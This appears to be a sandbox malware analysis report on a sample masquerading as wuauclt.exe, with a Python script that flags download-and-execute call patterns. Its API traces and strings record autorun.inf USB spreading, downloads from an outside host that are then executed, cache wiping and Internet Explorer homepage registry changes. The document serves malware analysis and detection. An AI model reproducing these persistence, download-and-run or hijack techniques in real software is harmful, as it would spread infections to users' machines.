                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Delete$File$CacheEntrySleep$DownloadEnvironmentFolderFromListLocationPathSpecialVariableVersion
                                                                            • String ID: MfimBljf9$MfimMkbf|86$ProgramFiles$XLhwawhfp%C{tiiqaw(vvi$XLhwawhfp%C{tiiqawZja}vokwc-a}c$_LhwawhfpVnlvqevpX$llc-p}r$lqrs>*)nwb(wimg`o`t-gjk,m`(w|q$qwj>
                                                                            • API String ID: 1888836333-1695214238
                                                                            • Opcode ID: e3da093745fd22060b98c53e03d59326e57067ec717ce08f2d96f7b452999480
                                                                            • Instruction ID: a5c779206b19b53d33bbc18893a0be02a82dcc92b5c72ba9f95bed763f7d3347
                                                                            • Opcode Fuzzy Hash: e3da093745fd22060b98c53e03d59326e57067ec717ce08f2d96f7b452999480
                                                                            • Instruction Fuzzy Hash: D09103746012099BD710FB65DD4AA8E77B8EF84308F1040BBB504BB2E3DA78AE418F5D

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetDriveTypeA.KERNEL32(00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 004063BF
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 00406420
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000006,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 00406440
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 00406468
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000080,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 0040648B
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000080,00000000,00000080,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 004064A9
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 004064C7
                                                                            • GetModuleFileNameA.KERNEL32(00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000,0040664A), ref: 004064EB
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0040651C
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000), ref: 004065F8
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000006,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080), ref: 00406618
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: File$Attributes$Delete$CopyDriveModuleNameType
                                                                            • String ID: [AutoRun]$\autorun.inf$\sxs.exe$open=sxs.exe$shell\Auto\command=sxs.exe$shellexecute=sxs.exe
                                                                            • API String ID: 4177304369-1696378998
                                                                            • Opcode ID: 299983fc2644e268d4eb946287a73f5fb260f3d8290e2a63062f545d2966dc6c
                                                                            • Instruction ID: d6a08cfd8c4e4eb5d113470b4235742803baeb825baf014acef4385ded9ab805
                                                                            • Opcode Fuzzy Hash: 299983fc2644e268d4eb946287a73f5fb260f3d8290e2a63062f545d2966dc6c
                                                                            • Instruction Fuzzy Hash: 31715370610108ABCB00FBA6C952A8E77B9AF84709F50853BB501B72D2CB7DAF11875D

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetDriveTypeA.KERNEL32(00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 0040601B
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 0040607C
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000006,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 0040609C
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 004060C4
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,00000080,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 004060E7
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000080,00000000,00000080,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 00406105
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000,004062A6,?,?,?,?,00000000,00000000), ref: 00406123
                                                                            • GetModuleFileNameA.KERNEL32(00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000,004062A6), ref: 00406147
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00406178
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080,00000000,00000000), ref: 00406254
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000006,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000000,00000000,00000080,00000000,00000080), ref: 00406274
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: File$Attributes$Delete$CopyDriveModuleNameType
                                                                            • String ID: [AutoRun]$\autorun.inf$\sxs.exe$open=sxs.exe$shell\Auto\command=sxs.exe$shellexecute=sxs.exe
                                                                            • API String ID: 4177304369-1696378998
                                                                            • Opcode ID: 72d8dda25f6a390e220326f2fa1f3eb7fa1cc818a7441e36ca5d2b25cd339c85
                                                                            • Instruction ID: 5df22afb16b272ec04df581e562d200e9037b34e0cc2cdfdfd0487ba17cb2571
                                                                            • Opcode Fuzzy Hash: 72d8dda25f6a390e220326f2fa1f3eb7fa1cc818a7441e36ca5d2b25cd339c85
                                                                            • Instruction Fuzzy Hash: C1711070A10508ABCB00FBA6C956A9F7779AF84709F50417BB501BB2D2CB7CAF05879D

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • FindWindowExA.USER32(00000000,?,IEFrame,00000000), ref: 004055BD
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405663
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00405874,?,00000000,00000000,?,004066FD,00406725,?,00000000,?,00407FF7,00000001,00000000,00000001), ref: 00405675
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0040569A
                                                                            • Sleep.KERNEL32(00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405874,?,00000000,00000000,?,004066FD,00406725,?), ref: 004056A8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: DeleteFile$CacheDownloadEntryFindSleepWindow
                                                                            • String ID: `tn{*q~w$kucm$lqrs>*)nwb(wimg`o`t-gjk,`jqm*q~w$t
                                                                            • API String ID: 2925464748-437854802
                                                                            • Opcode ID: e754100c373f77bf29b1a46c404491ba3345532de7349a65211476ef8906ed82
                                                                            • Instruction ID: fce2701fde403f0fd4f63779a484b59778674d3ae0df84e1f7a0fac326dad310
                                                                            • Opcode Fuzzy Hash: e754100c373f77bf29b1a46c404491ba3345532de7349a65211476ef8906ed82
                                                                            • Instruction Fuzzy Hash: F9811D70611205ABDB00FBA5D986A8E7BB9EF45708F10447BF540BB2E3CA78AD058B5D

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405663
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00405874,?,00000000,00000000,?,004066FD,00406725,?,00000000,?,00407FF7,00000001,00000000,00000001), ref: 00405675
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0040569A
                                                                            • Sleep.KERNEL32(00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405874,?,00000000,00000000,?,004066FD,00406725,?), ref: 004056A8
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00405750
                                                                            • Sleep.KERNEL32(00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405874,?,00000000), ref: 0040575E
                                                                            • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004057E2
                                                                            • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004057EC
                                                                            • DeleteFileA.KERNEL32(00000000,000003E8,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004057FE
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405810
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405822
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00405854
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Delete$File$CacheEntrySleep$Download$ExecuteShell
                                                                            • String ID: `tn{*q~w$kucm$lqrs>*)nwb(wimg`o`t-gjk,`jqm*q~w
                                                                            • API String ID: 4037061717-2671944630
                                                                            • Opcode ID: 1c8cd680d199ee75ae8e0b8104fb0c675f8e60050fccb8e235921e10a6a504ae
                                                                            • Instruction ID: 785d72677e56ec84aa5b7725342f13d88417e98dc42c661718efd2ccd2bec02f
                                                                            • Opcode Fuzzy Hash: 1c8cd680d199ee75ae8e0b8104fb0c675f8e60050fccb8e235921e10a6a504ae
                                                                            • Instruction Fuzzy Hash: 1C61EE706111059BDB00FBA6D986E8E77B8EF45709F10447AF500BB2E3DA78ED048B9D

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • FindWindowA.USER32(bbyb,bbyb), ref: 00408C06
                                                                            • FindWindowA.USER32(bbyb,bbyb), ref: 00408C1F
                                                                            • PostMessageA.USER32(00000000,bbyb,bbyb,00000012), ref: 00408C25
                                                                            • FindWindowA.USER32(bbyb,bbyb), ref: 00408C3A
                                                                            • SendMessageA.USER32(00000000,bbyb,bbyb,00000012), ref: 00408C40
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,bbyb,bbyb,00000000,00408DA8,?,00000004,00000000,00000000), ref: 00408C68
                                                                            • GetModuleFileNameA.KERNEL32(00400000,00000000,00000104,00000000,00000080,bbyb,bbyb,00000000,00408DA8,?,00000004,00000000,00000000), ref: 00408C94
                                                                            • DeleteFileA.KERNEL32(00000000,00400000,00000000,00000104,00000000,00000080,bbyb,bbyb,00000000,00408DA8,?,00000004,00000000,00000000), ref: 00408CC3
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00408CF5
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408D6D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: File$FindWindow$Message$AttributesCopyDeleteDirectoryExecuteModuleNamePostSendShellWindows
                                                                            • String ID: bbyb$open$wuauclt.exe
                                                                            • API String ID: 2051752798-429206649
                                                                            • Opcode ID: c02f680d421baac7dcbe5c8d626b2f82a67d78c6fd87cb3f780f2fb881bcbf69
                                                                            • Instruction ID: e6955b423cf41d5715ab26280c9398332a00561a3d493f58480fbd492c7ff700
                                                                            • Opcode Fuzzy Hash: c02f680d421baac7dcbe5c8d626b2f82a67d78c6fd87cb3f780f2fb881bcbf69
                                                                            • Instruction Fuzzy Hash: 784130706502059BD740FBA6C943F8E7AB99F98709F10413BB640B75D2CE7CA900866D

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00408232
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,004083C3,?,00000000,00000000,00000000,00000000,00000000,?,004084B6,?,00000000,?,004084C7), ref: 00408255
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0040828B
                                                                            • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004083C3,?,00000000,00000000,00000000,00000000,00000000), ref: 00408299
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00408380
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004083C3,?,00000000,00000000), ref: 004083A3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Delete$File$CacheEntry$DirectoryDownloadSleepWindows
                                                                            • String ID: HomePage$Software\Microsoft\Internet Explorer\Main$Software\Policies\Microsoft\Internet Explorer\Control Panel$Start Page$http://www.xxx.com/ie.txt$ies.dll$yes
                                                                            • API String ID: 1217617683-1617324073
                                                                            • Opcode ID: 44a14d38d0857f4629a371645b7bef155912f98c320ae8197e691e16fad146db
                                                                            • Instruction ID: 23d5ada1644d4a4c0fdc49a889b3002e5e187da7be67f6644f1964e870e1d3b9
                                                                            • Opcode Fuzzy Hash: 44a14d38d0857f4629a371645b7bef155912f98c320ae8197e691e16fad146db
                                                                            • Instruction Fuzzy Hash: 9A413E702002099BD700FB65DA46A4E77B8AF84709F50847FB940BB6D3DB7CAE018A6D

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405E02
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,00405F3C,?,00000000,00000000,00000000,00000000,00000000,?,00406707,00406725,?,00000000), ref: 00405E14
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00405E39
                                                                            • Sleep.KERNEL32(00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405F3C,?,00000000,00000000,00000000,00000000,00000000), ref: 00405E47
                                                                            • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000003), ref: 00405EEE
                                                                            • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00405F3C), ref: 00405EF8
                                                                            • DeleteFileA.KERNEL32(00000000,000003E8,00000000,00000000,00000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00405F0A
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 00405F1C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Delete$File$CacheEntrySleep$DirectoryDownloadExecuteShellWindows
                                                                            • String ID: A}vokwcq*`~f$`tn{5+r{p$kucm$lqrs>*)nwb(wimg`o`t-gjk,p`gm5+r{p
                                                                            • API String ID: 2803323816-32510556
                                                                            • Opcode ID: fce217dd2fc4c81ae6cb59f19938d9cdb7092590b9e8a6cfcb65c9ebfc36680a
                                                                            • Instruction ID: 62040580da8bc4b8ed49dd40f25ba5acd27351cacc19992f52bcfc8538425eb2
                                                                            • Opcode Fuzzy Hash: fce217dd2fc4c81ae6cb59f19938d9cdb7092590b9e8a6cfcb65c9ebfc36680a
                                                                            • Instruction Fuzzy Hash: 6241BC74711105ABD700FF6AD946A4E77B8EF85709F10407BB940BB2E3CA78AE018A6D

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00407C7F
                                                                            • Sleep.KERNEL32(000001F4,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00407C8D
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00407CD0
                                                                            • Sleep.KERNEL32(000001F4,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00407CDA
                                                                            • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407D0A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: FileSleep$CopyDirectoryDownloadExecuteShellWindows
                                                                            • String ID: bbyb.exe$bbybs.exe$http://www.xxx.com/abc.exe$open
                                                                            • API String ID: 1899506612-3830082169
                                                                            • Opcode ID: 74dddda8ba28423a3b8d1139dc2664c01dbdf4c90ccd245ff7deac2de5b3cde6
                                                                            • Instruction ID: bc9fdd56434a3f6b10c0c995d718bd545f813c534919513bdb7c3ec1913c9215
                                                                            • Opcode Fuzzy Hash: 74dddda8ba28423a3b8d1139dc2664c01dbdf4c90ccd245ff7deac2de5b3cde6
                                                                            • Instruction Fuzzy Hash: A231F170A442096BD700FBA5D942BAE7BBDEF44709F50407BB500B76D2DB78BE00866E
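The two records above (the routines at 00405E02 and 00407C7F) share one shape: URLDownloadToFileA, a Sleep, then ShellExecuteA, with DeleteUrlCacheEntry/DeleteFileA or CopyFileA around them. The Python below is an added example and not part of the Joe Sandbox report: it parses the report's own "APIs" lines into structured calls, flags a function as download-and-execute when a fetch API is followed at a higher call-site address by a launch API, totals the literal Sleep() arguments, and extracts the ShellExecute verb. The API sets and the order-by-address heuristic are choices made here, not something the report defines; the sample lines are copied from the bbyb.exe record.

```python
import re
from collections import namedtuple

# Constructed input: the API lines of the 00407C7F routine, copied from the
# record above (bullets kept; indentation is irrelevant to the parser).
SAMPLE_RECORD = """
  • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
• URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00407C7F
• Sleep.KERNEL32(000001F4,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00407C8D
• CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00407CD0
• Sleep.KERNEL32(000001F4,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00407CDA
• ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407D0A
"""

ApiCall = namedtuple("ApiCall", "api module args ref subcall")

# One report line: optional bullet, optional "Part of subcall function XXXXXXXX:",
# then API.MODULE(arg,arg,...), ref: XXXXXXXX.  Arguments are hex words, "?" or
# a literal string such as "open".
LINE_RE = re.compile(
    r"^(?:•\s*)?"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$"
)


def parse_api_lines(text):
    """Parse Joe Sandbox 'APIs' lines into ApiCall tuples; ref is an int address."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError("unrecognised API line: %r" % line)
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             int(m.group("ref"), 16), m.group("sub") is not None))
    return calls


# Hypothetical triage sets chosen for this example, not defined by the report.
DOWNLOAD_APIS = {"URLDownloadToFileA", "URLDownloadToFileW", "URLDownloadToCacheFileA"}
LAUNCH_APIS = {"ShellExecuteA", "ShellExecuteW", "ShellExecuteExA", "ShellExecuteExW",
               "WinExec", "CreateProcessA", "CreateProcessW"}


def is_download_and_execute(calls):
    """True when the function itself (subcall lines excluded) fetches a URL to
    disk and launches something at a higher call-site address.  Address order
    approximates execution order; it holds for the straight-line routines in
    this report but not in general for code with backward branches."""
    own = [c for c in calls if not c.subcall]
    fetch = [c.ref for c in own if c.api in DOWNLOAD_APIS]
    launch = [c.ref for c in own if c.api in LAUNCH_APIS]
    return any(l > f for f in fetch for l in launch)


def total_sleep_ms(calls):
    """Sum the literal first argument of every Sleep call (hex milliseconds)."""
    total = 0
    for c in calls:
        if c.api == "Sleep" and c.args and re.fullmatch(r"[0-9A-Fa-f]{8}", c.args[0]):
            total += int(c.args[0], 16)
    return total


def shell_verbs(calls):
    """The lpOperation argument of each ShellExecute* call when it is a literal."""
    return [c.args[1] for c in calls
            if c.api.startswith("ShellExecute") and len(c.args) > 1
            and c.args[1] not in ("00000000", "?")]


if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE_RECORD)
    print("download-and-execute:", is_download_and_execute(calls))
    print("literal Sleep() total:", total_sleep_ms(calls), "ms")
    print("ShellExecute verbs:", shell_verbs(calls))
```

Run against the 00405E02 record, the same parser finds the download-and-execute pair as well (URLDownloadToFileA at 00405E39, ShellExecuteA at 00405EEE), with 0xBB8 + 0x3E8 = 4000 ms of literal sleeps in between; on the 00408168 record it reports no launch, which matches that routine only fetching and deleting cache entries.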

                                                                            Control-flow Graph
                                                                            (function 00408A20; the rendered graph is not preserved in this export) 408a20-408a82 LoadIconA, LoadCursorA, RegisterClassA -> 408a88-408aba call 00404414 (CreateWindowExA) -> 408abc-408add SetTimer -> message loop: 408aeb-408af9 GetMessageA, 408adf-408ae6 TranslateMessage, DispatchMessageA -> 408afb-408b0b KillTimer -> 408b10-408b12 return. Each of the first two blocks also has an edge straight to 408b10-408b12.
                                                                            APIs
                                                                            • LoadIconA.USER32(00000000,00007F00), ref: 00408A4E
                                                                            • LoadCursorA.USER32(00000000,00007F00), ref: 00408A5D
                                                                            • RegisterClassA.USER32(0042AE18), ref: 00408A7A
                                                                              • Part of subcall function 00404414: CreateWindowExA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040443D
                                                                            • SetTimer.USER32(00000000,00000001,000005DC,004084C8), ref: 00408AD0
                                                                            • TranslateMessage.USER32(0042AE44), ref: 00408AE0
